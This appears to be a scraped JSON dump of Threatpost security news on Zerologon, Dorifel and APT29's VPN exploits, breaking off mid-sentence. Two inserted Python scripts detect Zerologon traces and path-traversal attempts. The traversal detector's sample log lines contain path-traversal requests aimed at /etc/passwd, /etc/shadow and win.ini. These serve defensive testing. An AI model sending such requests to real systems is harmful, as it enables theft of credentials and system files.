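The chain the advisory describes (VPN foothold, Zerologon password reset on a domain controller, credential theft with Mimikatz or CrackMapExec) leaves on-host traces that a SOC can hunt for. The following Python triage routine is an added example, not code from Threatpost, CISA or Microsoft. It assumes Windows events have already been parsed into name/value dicts; the EventData field names used (SubjectUserSid, TargetUserName, PasswordLastSet, LogonType, TargetUserSid, IpAddress, SamAccountName) follow the Windows event XML and should be checked against your collector's schema; the NETLOGON event IDs 5827, 5828 and 5829 are the ones Microsoft added with the August 2020 update; the sample records are constructed, not a capture.

```python
"""Hunt for on-host indicators of a Zerologon (CVE-2020-1472) exploit chain.

Added example; not from the article or the CISA/FBI advisory. Event field
names below are assumptions modelled on the Windows event XML and should be
verified against the collector in use.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

ANONYMOUS_LOGON_SID = "S-1-5-7"
# Netlogon event IDs added to the System log by the August 2020 update:
# 5827/5828 = a vulnerable (unsigned/unsealed) secure-channel connection was
# denied for a machine / trust account; 5829 = such a connection was allowed
# because enforcement mode was not yet on.
NETLOGON_DENIED = {5827, 5828}
NETLOGON_ALLOWED_VULNERABLE = 5829


@dataclass
class Event:
    when: datetime
    event_id: int
    host: str                                           # computer that logged the event
    data: Dict[str, str] = field(default_factory=dict)  # EventData name/value pairs


def is_anonymous_machine_password_reset(e: Event) -> bool:
    """Security 4742 (computer account changed) where the subject is ANONYMOUS
    LOGON and 'Password Last Set' was updated. Machine-password rotation is
    performed by the machine account itself, never by S-1-5-7, so this matches
    the NetrServerPasswordSet2 step of a Zerologon exploit."""
    return (
        e.event_id == 4742
        and e.data.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
        and e.data.get("TargetUserName", "").endswith("$")
        and e.data.get("PasswordLastSet", "-") != "-"
    )


def scan(events: List[Event], window: timedelta = timedelta(minutes=10)) -> List[Tuple[str, str]]:
    """Return (severity, message) findings in time order."""
    findings: List[Tuple[str, str]] = []
    events = sorted(events, key=lambda e: e.when)
    for e in events:
        stamp = f"{e.when:%Y-%m-%d %H:%M:%S} {e.host}"
        if is_anonymous_machine_password_reset(e):
            acct = e.data["TargetUserName"]
            # Resetting the DC's own machine account is the classic Zerologon signature.
            sev = "critical" if acct.upper() == e.host.upper() + "$" else "high"
            findings.append((sev, f"{stamp}: 4742 password reset of {acct} by ANONYMOUS LOGON"))
            # Corroborate with a preceding anonymous network logon (4624, type 3),
            # which carries the source address of the exploit host.
            for p in events:
                if (p.event_id == 4624 and p.host == e.host
                        and p.data.get("LogonType") == "3"
                        and p.data.get("TargetUserSid") == ANONYMOUS_LOGON_SID
                        and timedelta(0) <= e.when - p.when <= window):
                    findings.append(("info", f"{stamp}: preceded by anonymous logon from {p.data.get('IpAddress')}"))
        elif e.event_id in NETLOGON_DENIED:
            findings.append(("medium", f"{stamp}: Netlogon {e.event_id} denied vulnerable channel for {e.data.get('SamAccountName')}"))
        elif e.event_id == NETLOGON_ALLOWED_VULNERABLE:
            findings.append(("high", f"{stamp}: Netlogon 5829 allowed vulnerable channel for {e.data.get('SamAccountName')} (enforcement off)"))
    return findings


T = datetime(2020, 9, 21, 12, 0, 0)
SAMPLE_EVENTS = [  # constructed records, not a real capture
    Event(T, 4624, "DC01", {"LogonType": "3", "TargetUserSid": ANONYMOUS_LOGON_SID,
                            "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "10.9.8.7"}),
    Event(T + timedelta(seconds=3), 4742, "DC01", {"SubjectUserSid": ANONYMOUS_LOGON_SID,
                                                   "SubjectUserName": "ANONYMOUS LOGON",
                                                   "TargetUserName": "DC01$",
                                                   "PasswordLastSet": "9/21/2020 12:00:03 PM"}),
    # Routine rotation: the machine changes its own password, so no finding.
    Event(T + timedelta(minutes=30), 4742, "DC01", {"SubjectUserSid": "S-1-5-21-1-2-3-1000",
                                                    "SubjectUserName": "DC01$",
                                                    "TargetUserName": "DC01$",
                                                    "PasswordLastSet": "9/21/2020 12:30:00 PM"}),
    Event(T + timedelta(hours=1), 5829, "DC02", {"SamAccountName": "NAS01$", "ClientIPAddress": "10.1.1.20"}),
]


def demo() -> List[Tuple[str, str]]:
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for sev, msg in demo():
        print(f"[{sev}] {msg}")
```

The 4742-by-ANONYMOUS-LOGON rule is the high-confidence signal; the 5829 rule is noisier (it also fires for legitimate non-Windows devices that cannot sign Netlogon traffic) and is there to inventory what will break once enforcement mode is turned on.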
[Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on [GitHub](<https://github.com/dirkjanm/CVE-2020-1472>). This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Server domain controllers against the flaw by Sept. 21.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:28", "description": "While much of the world was focused yesterday on the [Gauss malware](<https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/>) saga, there was another interesting infection happening, mainly in the Netherlands, that researchers think may be related to the [Zeus](<https://threatpost.com/zeus-source-code-leaked-051011/>) and [Citadel](<https://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>) attacks, 
though the motivation behind the attack is somewhat of a mystery. The new malware, called Dorifel, has infected thousands of businesses in the Netherlands and Europe and researchers say that it\u2019s stealing online banking data and the crew behind it may be working on some other attack campaigns, as well.\n\nDorifel is being distributed through phishing emails with a link, which, when clicked, will take the user to a site from which a binary is downloaded. The malware then downloads a secondary component that encrypts the files on the infected machine. This is the kind of behavior that one might expect from a piece of ransomware, such as [Reveton](<https://threatpost.com/reveton-ransomware-uses-fake-fbi-message-extort-money-080912/>), but there is no demand for payment from the victim. The malware also will look for network shares and then attempt to encrypt files found on those, as well.\n\nResearchers looking at the Dorifel infections found that, aside from the odd concentration of infections in the Netherlands, there are a couple of other odd components to the attack campaign. [David Jacoby](<https://www.securelist.com/en/blog/208193776/Dorifel_is_much_bigger_than_expected_and_it_s_still_active_and_growing>), a malware researcher at Kaspersky Lab, traced the malware back to the hosting servers, and found that not only was Dorifel hosted there, there also were several other pieces of malware being hosted on those boxes, along with a lot of stolen financial information.\n\n\u201cThis is a very strong indication that the gang behind the Dorifel malware was also doing some other really nasty scams. We were also able to download other samples of various malware which is still being investigated by the malware analysts at Kaspersky Lab,\u201d Jacoby said.\n\nAlong with the stolen financial data, which included credit card numbers, CVVs and victims\u2019 names, the servers also contained exploits for a pair of Java vulnerabilities. 
One of those flaws, [CVE-2012-0507](<https://threatpost.com/volume-malware-targeting-java-cve-2012-1723-flaw-spikes-080312/>), has been used in a variety of targeted attacks and other malware campaigns. \n\nAnalysts at [Fox-IT](<http://blog.fox-it.com/2012/08/09/xdoccryptdorifel-document-encrypting-and-network-spreading-virus/>) looked at the malware and attack techniques and saw indications that the attack may be somehow related to the Zeus and Citadel malware.\n\n\u201cThe big question is of course, what is the purpose of this Trojan, one might suspect it is ransomware, but without a ransom note I guess that would be a no go. The fact that it infects shares means that it will spread to other systems that open the infected \u2018documents\u2019 on a share. Additionally HTTP based connection functionality suggests that the Trojan has additional download tasks and likely executes additional payloads on systems that have been infected. Given the Modus Operandi of this operation, it is likely that it downloads the Citadel Trojan and this entire attack was just to increase the size of the botnet through spreading of network shares. Currently however there appears to be no task defined and no additional malware is downloaded,\u201d the company said in its analysis.\n\nJacoby saw some of the same indications in his research, as well, but nothing completely definitive about the link between Dorifel and Zeus or Citadel.\n\n\u201cAs mentioned before, we did find some interesting financial information, which could be an indication that this malware scam is related to for example ZeuS/Citadel, but since we have not yet identified any malware related to ZeuS/Citadel we cannot confirm it. All we can confirm is that the same server does store stolen financial information. 
We are still investigating this,\u201d he said.\n\nThe large majority of the infections from Dorifel have been found in the Netherlands so far, but there also are infected machines in other European countries, including Denmark, and a handful in the United States, too.\n", "cvss3": {}, "published": "2012-08-10T14:24:54", "type": "threatpost", "title": "Dorifel Malware Encrypts Files, Steals Financial Data, May Be Related to Zeus or Citadel", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723"], "modified": "2015-04-13T17:37:40", "id": "THREATPOST:427F2EA5BAE6D1C835F7B049DD5D6D27", "href": "https://threatpost.com/dorifel-malware-encrypts-files-steals-financial-data-may-be-related-zeus-or-citadel-081012/76900/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. 
and allied national-security and government networks, it added.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. 
elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortiOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. 
It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacor Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. An attacker can send a specially crafted URI to trigger it. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched the flaw.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who had already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen in September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. 
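Three of the five bugs in the NSA list (CVE-2018-13379, CVE-2019-11510 and CVE-2019-19781), and the Fortinet initial-access step in the CISA/FBI Zerologon advisory, all belong to the same class: an unauthenticated HTTP request whose path climbs out of the directory the appliance meant to serve. The script below is an added example, not code from Threatpost, the NSA, Cisco Talos or any of the vendors, and it deliberately does not reproduce any product's real exploit URI. It resolves request targets from access logs the way a naive file-serving handler would and flags traversal attempts, including double percent-encoding and backslash separators. It assumes the common log format; the log lines are constructed, not captured.

```python
"""Flag path-traversal attempts in web/VPN appliance access logs.

Added example; not from the article or any vendor. The log format and the
sample lines are assumptions/constructed data.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Common log format: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """Undo stacked percent-encoding (%252e -> %2e -> .) until the value is stable."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def analyse_target(target: str) -> Dict[str, object]:
    """Resolve a request target like a naive handler and report whether it
    tried to climb out of the directory it started in."""
    raw = target.split("?", 1)[0]
    # Backslash is a separator for Windows-backed handlers; normalise it too.
    decoded = decode_fully(raw).replace("\\", "/")
    stack: List[str] = []
    dotdot = 0
    escaped = False
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue                  # '//' and '/./' do not move the path
        if seg == "..":
            dotdot += 1
            if stack:
                stack.pop()
            else:
                escaped = True        # climbed above the starting directory
        else:
            stack.append(seg)
    return {"path": "/" + "/".join(stack), "dotdot": dotdot,
            "escaped": escaped, "encoded": decoded != raw}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request that contains a '..' segment after decoding."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                  # unparseable line; a real tool would count these
        info = analyse_target(m["target"])
        if info["dotdot"] == 0:
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"], "ts": m["ts"], "status": status, "target": m["target"],
            # A 2xx on a traversal request means the appliance actually served the file.
            "severity": "high" if 200 <= status < 300 else "medium",
            **info,
        })
    return findings


SAMPLE_LOG = [  # constructed lines; not real exploit URIs for any product
    '10.0.0.5 - - [16/Apr/2021:10:01:02 +0000] "GET /remote/login?lang=en HTTP/1.1" 200 1234',
    '203.0.113.9 - - [16/Apr/2021:10:01:05 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1810',
    '203.0.113.9 - - [16/Apr/2021:10:01:09 +0000] "GET /img/%252e%252e/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 403 0',
    r'198.51.100.4 - - [16/Apr/2021:10:02:11 +0000] "GET /css/..\..\win.ini HTTP/1.1" 404 0',
    '10.0.0.6 - - [16/Apr/2021:10:03:00 +0000] "GET /docs/./guide/index.html HTTP/1.1" 200 500',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['status']} {f['target']} -> {f['path']}"
              f" (escaped={f['escaped']}, encoded={f['encoded']})")
```

Note what the decoder catches that a plain substring match for `../` misses: a double-encoded request only reveals its `..` segments after the second decode round, and a backslash variant never contains a forward-slash `../` at all. Severity keys off the response status because, as the Pulse Secure and Fortinet cases show, the useful question for incident response is not whether someone tried but whether the appliance handed over the file.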
\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway can allow remote code execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **CVE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMware Workspace ONE Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on the underlying operating system. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug, or with credentials obtained elsewhere, to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. 
State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware Workspace ONE Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware vRealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:30", "description": "It\u2019s been nearly two months since Oracle patched the [CVE-2012-1723 Java vulnerability](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723>), a serious remote pre-authentication flaw that\u2019s present in the Java Runtime Environment. It\u2019s taken a little time, but the attacker community has decided that this bug deserves some serious attention, and as a result, attacks trying to exploit it